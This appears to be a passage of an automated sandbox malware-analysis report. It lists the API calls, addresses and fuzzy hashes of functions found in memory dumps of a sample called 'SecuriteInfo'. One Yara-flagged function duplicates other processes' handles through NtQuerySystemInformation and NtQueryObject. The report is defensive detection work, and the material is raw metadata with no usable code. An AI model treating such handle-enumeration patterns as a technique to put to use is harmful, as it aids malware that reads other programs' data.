                                          • Instruction ID: 9915dc1f0c2212f3a7651b2dbbf52412857bf7037bb6fddf82c761da90f46195
                                          • Opcode Fuzzy Hash: 39ae5f170c611ac7e16690354fbd74b063b05dc7afffe292bab36b645283d42c
                                          • Instruction Fuzzy Hash: 4EB118356106099FD725CF28C48AB657BB0FF45364F298699E89ACF3A1C339ED91CB40
                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 007D0152
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: FeaturePresentProcessor
                                          • String ID:
                                          • API String ID: 2325560087-0
                                          • Opcode ID: c7e3cb259701ffe09103ea18a69566f9cae0562247c87141192fd5186e86b3be
                                          • Instruction ID: c0d83ef13305ddf6a4b298e99dee2ec255c573e5bb0a8871fe5fd2c7a0e8a4c3
                                          • Opcode Fuzzy Hash: c7e3cb259701ffe09103ea18a69566f9cae0562247c87141192fd5186e86b3be
                                          • Instruction Fuzzy Hash: 26515AB19012099FDB15CFA8E9857AEBBF4FB48310F24D42AD509EB351E37CA940CB94
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 38908f4e869f203113194be2c37d6bc2f80a35ab35986c09ce5430c1b95e19f8
                                          • Instruction ID: 38c0ca271dd49a9fcab6e7e2884bbf5d1bee2f59858f382f76e4fddec529c342
                                          • Opcode Fuzzy Hash: 38908f4e869f203113194be2c37d6bc2f80a35ab35986c09ce5430c1b95e19f8
                                          • Instruction Fuzzy Hash: 5441B4B5805258AFDF20DF69CC89AAAB7BDAF49300F1442D9E40DD3201DA389E858F10
                                          APIs
                                            • Part of subcall function 007DA8F0: GetLastError.KERNEL32(?,?,007D71B7,?,?,?,?,00000003,007D4382,?,007D42F1,?,00000000,007D4500), ref: 007DA8F4
                                            • Part of subcall function 007DA8F0: SetLastError.KERNEL32(00000000,00000000,007D4500,?,?,?,?,?,00000000,?,?,007D459E,00000000,00000000,00000000,00000000), ref: 007DA996
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007E5383
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: ErrorLast$InfoLocale
                                          • String ID:
                                          • API String ID: 3736152602-0
                                          • Opcode ID: 816c4179c7e26f2425694283653593a5520664bc0988523b42d80ec60f0dc1df
                                          • Instruction ID: 1a4e390ac79d580dcbb8bcfe241261de0aadf4501f31ed96024436be3b5e2305
                                          • Opcode Fuzzy Hash: 816c4179c7e26f2425694283653593a5520664bc0988523b42d80ec60f0dc1df
                                          • Instruction Fuzzy Hash: A921C57261268AABDB289F16DC46ABA73B8EF48359F10407AFD01C6141EB7CED41C750
                                          APIs
                                            • Part of subcall function 007DA8F0: GetLastError.KERNEL32(?,?,007D71B7,?,?,?,?,00000003,007D4382,?,007D42F1,?,00000000,007D4500), ref: 007DA8F4
                                            • Part of subcall function 007DA8F0: SetLastError.KERNEL32(00000000,00000000,007D4500,?,?,?,?,?,00000000,?,?,007D459E,00000000,00000000,00000000,00000000), ref: 007DA996
                                          • EnumSystemLocalesW.KERNEL32(007E50DC,00000001,00000000,?,-00000050,?,007E5710,00000000,?,?,?,00000055,?), ref: 007E5028
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem
                                          • String ID:
                                          • API String ID: 2417226690-0
                                          • Opcode ID: ff973e0397c9b297af92845428be61c57f363087b8dd63f5aec76e88b85b23ca
                                          • Instruction ID: 013ff46a93acd6e2087998b605ec3da10ad53afc2a61723e3b04ec33e7a1578b
                                          • Opcode Fuzzy Hash: ff973e0397c9b297af92845428be61c57f363087b8dd63f5aec76e88b85b23ca
                                          • Instruction Fuzzy Hash: 0A114C372017059FDB289F39C89167AB791FF88358B18442DEA4687740D379B943C740
                                          APIs
                                            • Part of subcall function 007DA8F0: GetLastError.KERNEL32(?,?,007D71B7,?,?,?,?,00000003,007D4382,?,007D42F1,?,00000000,007D4500), ref: 007DA8F4
                                            • Part of subcall function 007DA8F0: SetLastError.KERNEL32(00000000,00000000,007D4500,?,?,?,?,?,00000000,?,?,007D459E,00000000,00000000,00000000,00000000), ref: 007DA996
                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,007E52F8,00000000,00000000,?), ref: 007E558A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: ErrorLast$InfoLocale
                                          • String ID:
                                          • API String ID: 3736152602-0
                                          • Opcode ID: d269126c945ec202975ca482052d213504fcf0c55f86abb84c9c80ec327088d4
                                          • Instruction ID: e009c6f6573a933ce68ceb19e02e98b3223876b4f57f0bde221710eaecb0c126
                                          • Opcode Fuzzy Hash: d269126c945ec202975ca482052d213504fcf0c55f86abb84c9c80ec327088d4
                                          • Instruction Fuzzy Hash: BE01FE32601657BFDB285725CC457BB3766EF44758F154429ED06E3180EA38FE51C6A0
                                          APIs
                                            • Part of subcall function 007DA8F0: GetLastError.KERNEL32(?,?,007D71B7,?,?,?,?,00000003,007D4382,?,007D42F1,?,00000000,007D4500), ref: 007DA8F4
                                            • Part of subcall function 007DA8F0: SetLastError.KERNEL32(00000000,00000000,007D4500,?,?,?,?,?,00000000,?,?,007D459E,00000000,00000000,00000000,00000000), ref: 007DA996
                                          • EnumSystemLocalesW.KERNEL32(007E532F,00000001,00000000,?,-00000050,?,007E56D8,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 007E509B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem
                                          • String ID:
                                          • API String ID: 2417226690-0
                                          • Opcode ID: 7c7bb13d87782aa3e8dbb9a0b63bf087f886da4356379eac223e91b9135a5330
                                          • Instruction ID: b2c45b159217c31de7a9fbf29c56e3cba101b012099639fddee6e7d812fd41c8
                                          • Opcode Fuzzy Hash: 7c7bb13d87782aa3e8dbb9a0b63bf087f886da4356379eac223e91b9135a5330
                                          • Instruction Fuzzy Hash: BCF04C36301B485FCB245F3A98C167A7BA1EF8835CB04402DF9054B640C6B59C42C750
                                          APIs
                                            • Part of subcall function 007D49CA: EnterCriticalSection.KERNEL32(-007FB8A8,?,007D76D7,00000000,007F8C40,0000000C,007D769F,?,?,007DDB90,?,?,007DAA8E,00000001,00000364,00000000), ref: 007D49D9
                                          • EnumSystemLocalesW.KERNEL32(007DDBBA,00000001,007F8E30,0000000C,007DDF92,00000000), ref: 007DDBFF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                          • String ID:
                                          • API String ID: 1272433827-0
                                          • Opcode ID: 62ff344920953ccdca659750f5c21115e04449ea6a030882b57b553ba9b5dd76
                                          • Instruction ID: 6c960e8ad207d854cfd120a39b705436e7ad1827a507df62dbdcaf844791de13
                                          • Opcode Fuzzy Hash: 62ff344920953ccdca659750f5c21115e04449ea6a030882b57b553ba9b5dd76
                                          • Instruction Fuzzy Hash: 9DF03772A10204DFDB10DF98E846BAD7BB1EB08720F00812BE5049B3A0DBBD9900CB55
                                          APIs
                                            • Part of subcall function 007DA8F0: GetLastError.KERNEL32(?,?,007D71B7,?,?,?,?,00000003,007D4382,?,007D42F1,?,00000000,007D4500), ref: 007DA8F4
                                            • Part of subcall function 007DA8F0: SetLastError.KERNEL32(00000000,00000000,007D4500,?,?,?,?,?,00000000,?,?,007D459E,00000000,00000000,00000000,00000000), ref: 007DA996
                                          • EnumSystemLocalesW.KERNEL32(007E4EC4,00000001,00000000,?,?,007E5732,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 007E4FA2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem
                                          • String ID:
                                          • API String ID: 2417226690-0
                                          • Opcode ID: 2a684be343d6d5ce8d0a597d689d2a7b6ac00ecf4265e1b102ed9c3ed1c8a03f
                                          • Instruction ID: 52f08125eacc07c6f51e9e879614e13bb7ca8443f2c2cc0680c8c76cbf08483e
                                          • Opcode Fuzzy Hash: 2a684be343d6d5ce8d0a597d689d2a7b6ac00ecf4265e1b102ed9c3ed1c8a03f
                                          • Instruction Fuzzy Hash: 0CF0E5367002C69BCF149F3AD84966ABFA4FFC5B10B0A4059EE058F691C6799882C790
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,007D9527,?,20001004,00000000,00000002,?,?,007D8B19), ref: 007DE0CA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID:
                                          • API String ID: 2299586839-0
                                          • Opcode ID: e2427454e5a4208b2dafe54fe4e1f267a3c514e3f1024819542890f33bce5250
                                          • Instruction ID: 3fb08e348576364ff2f1e0cd3dd1a50d8f91faaf1ed72df641bfa7dfd3998e87
                                          • Opcode Fuzzy Hash: e2427454e5a4208b2dafe54fe4e1f267a3c514e3f1024819542890f33bce5250
                                          • Instruction Fuzzy Hash: ACE01232501118BBCB123F51DC08B9D3E2ABB48750F148415FD055A26187799D20EA95
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0006062E,007CFC56), ref: 007D0627
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: d76f1eb26a1382901ea5a8f55c5c0ffac737492961a60d50fa4f947ffe58908b
                                          • Instruction ID: 00d331f43958ed95cb4b287b3a6294676238685a42a2550b7e14030a50437633
                                          • Opcode Fuzzy Hash: d76f1eb26a1382901ea5a8f55c5c0ffac737492961a60d50fa4f947ffe58908b
                                          • Instruction Fuzzy Hash:
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: HeapProcess
                                          • String ID:
                                          • API String ID: 54951025-0
                                          • Opcode ID: 5114a365ae6b734d2a4d75b3d0b459fb92af825966c305f205e43bc496b8305f
                                          • Instruction ID: 42759a91c8dbb14326e9cb74d96587778c847448251b6441782c1ef93928e3ea
                                          • Opcode Fuzzy Hash: 5114a365ae6b734d2a4d75b3d0b459fb92af825966c305f205e43bc496b8305f
                                          • Instruction Fuzzy Hash: 97A001B162224ACB97408F35AF492193BE9AA49A91B16C1A9A505CA160EB388450DA09
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0a000a9e535a8289a552d6f007a0ff04bd4daf3c708cc99060d94078053bbd9f
                                          • Instruction ID: b64aa603c219eead9b586cfac14e2bca40c7dfe5c324d8874846af660566ac34
                                          • Opcode Fuzzy Hash: 0a000a9e535a8289a552d6f007a0ff04bd4daf3c708cc99060d94078053bbd9f
                                          • Instruction Fuzzy Hash: DB325821D69F424DD7239634D8723356258AFB73C4F25D737F82AB5AAAEB2CD4938100
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: ErrorLast
                                          • String ID:
                                          • API String ID: 1452528299-0
                                          • Opcode ID: 4252944fdd24e0ab06015ca56b62e193372d2ca5e9843bddefdfd40febaf14c9
                                          • Instruction ID: ad8a01f4622bf310b90d6a9db21089b8d75e2cf411458585befd38e235002620
                                          • Opcode Fuzzy Hash: 4252944fdd24e0ab06015ca56b62e193372d2ca5e9843bddefdfd40febaf14c9
                                          • Instruction Fuzzy Hash: 3BB127755017819BDB389F26CC86BB7B3E8EF48308F14852DE943C6680EA79B981CB10
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                          • Instruction ID: e14daaea0d053023d4adf44f60af3058f96af05a211ad7c565b1ce11678af3c8
                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                          • Instruction Fuzzy Hash: 22115B772000C263DA14CA7DE8B45B6A3B5EBC5320BACC3BBD0438B744D52ED851D600
                                          APIs
                                          • GetModuleHandleA.KERNEL32(ntdll,NtQuerySystemInformation,00000000,00000000,00000000,?,?,?,?,038F4574), ref: 038F4305
                                          • GetProcAddress.KERNEL32(00000000), ref: 038F430E
                                          • GetModuleHandleA.KERNEL32(ntdll,NtQueryObject,?,?,?,?,038F4574), ref: 038F431F
                                          • GetProcAddress.KERNEL32(00000000), ref: 038F4322
                                            • Part of subcall function 038F3508: EnterCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F3512
                                            • Part of subcall function 038F3508: GetProcessHeap.KERNEL32(00000008,00000208,?,?,038F51B7), ref: 038F351B
                                            • Part of subcall function 038F3508: RtlAllocateHeap.NTDLL(00000000,?,?,038F51B7), ref: 038F3522
                                            • Part of subcall function 038F3508: LeaveCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F352B
                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,?,?,?,?,038F4574), ref: 038F43A4
                                          • GetCurrentProcess.KERNEL32(038F4574,00000000,00000000,00000002,?,?,?,?,038F4574), ref: 038F43C0
                                          • DuplicateHandle.KERNEL32(?,?,00000000,?,?,?,?,038F4574), ref: 038F43CF
                                          • CloseHandle.KERNEL32(038F4574,?,?,?,?,038F4574), ref: 038F43FF
                                          • GetCurrentProcess.KERNEL32(038F4574,00000000,00000000,00000001,?,?,?,?,038F4574), ref: 038F440D
                                          • DuplicateHandle.KERNEL32(?,?,00000000,?,?,?,?,038F4574), ref: 038F441C
                                          • CloseHandle.KERNEL32(?,?,?,?,?,038F4574), ref: 038F442F
                                          • CloseHandle.KERNEL32(000000FF), ref: 038F4452
                                          • CloseHandle.KERNEL32(?), ref: 038F445A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Handle$CloseProcess$AddressCriticalCurrentDuplicateHeapModuleProcSection$AllocateEnterLeaveOpen
                                          • String ID: NtQueryObject$NtQuerySystemInformation$ntdll
                                          • API String ID: 3110323036-2044536123
                                          • Opcode ID: d61fb418ffbcc16d206c60d171413d1012d34a5561019add4e6feec311c4213b
                                          • Instruction ID: 6f1c6102454c363e43c3b41a1a83245f4c87e9208ce393a9425394c960270dc7
                                          • Opcode Fuzzy Hash: d61fb418ffbcc16d206c60d171413d1012d34a5561019add4e6feec311c4213b
                                          • Instruction Fuzzy Hash: BD417571A01619AFDB10EBE69C44EAFFBB9EF94750F1441A6F614E7290D770CA40CBA0
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: Yarn$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                          • String ID: bad locale name
                                          • API String ID: 3904239083-1405518554
                                          • Opcode ID: 87bd7e9fad02e036b4b10c8e14443a215197860f616ddc1f23b9e84635b79a33
                                          • Instruction ID: bbcc58f3fc6a053a117a1f14ef0100afba984cacad76cb991ae7fb5cdb89b306
                                          • Opcode Fuzzy Hash: 87bd7e9fad02e036b4b10c8e14443a215197860f616ddc1f23b9e84635b79a33
                                          • Instruction Fuzzy Hash: B22151B0904289DBCF05EFA8C955BBEB771EF45308F14855CE5262B3C2CB795A10CB61
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __aulldvrm
                                          • String ID: (null)$(null)$0123456789ABCDEF$0123456789abcdef
                                          • API String ID: 1302938615-1267642376
                                          • Opcode ID: 2bc6ee3f3f66947fce7839331feadc88616686df49062b0c324f26a1f1d581de
                                          • Instruction ID: 5c90f817bca97e66d468714d1e7e3d50af8174f00ae2905ac16860c9b8f5ca61
                                          • Opcode Fuzzy Hash: 2bc6ee3f3f66947fce7839331feadc88616686df49062b0c324f26a1f1d581de
                                          • Instruction Fuzzy Hash: B9918E74604706CFD725CF68C48462AFBE5EF84344F284DAEEA9AC7651D370E881CB51
                                          APIs
                                          • type_info::operator==.LIBVCRUNTIME ref: 007D3400
                                          • ___TypeMatch.LIBVCRUNTIME ref: 007D350E
                                          • _UnwindNestedFrames.LIBCMT ref: 007D3660
                                          • CallUnexpected.LIBVCRUNTIME ref: 007D367B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                          • String ID: csm$csm$csm
                                          • API String ID: 2751267872-393685449
                                          • Opcode ID: 839a10e6443965dac5fe766a4bd4ecb7438fb942b69860abc053d1bc94d464e9
                                          • Instruction ID: ef3e202ab3eea290ddf654e9fac9ab336c6cd27930ece9a5f9da8c8b5ad85626
                                          • Opcode Fuzzy Hash: 839a10e6443965dac5fe766a4bd4ecb7438fb942b69860abc053d1bc94d464e9
                                          • Instruction Fuzzy Hash: D0B16971800209EFCF15DFA4D9859AEBBB5BF18310B14455BE8056B302D739DB62CFA2
                                          Strings
                                          Memory Dump Source
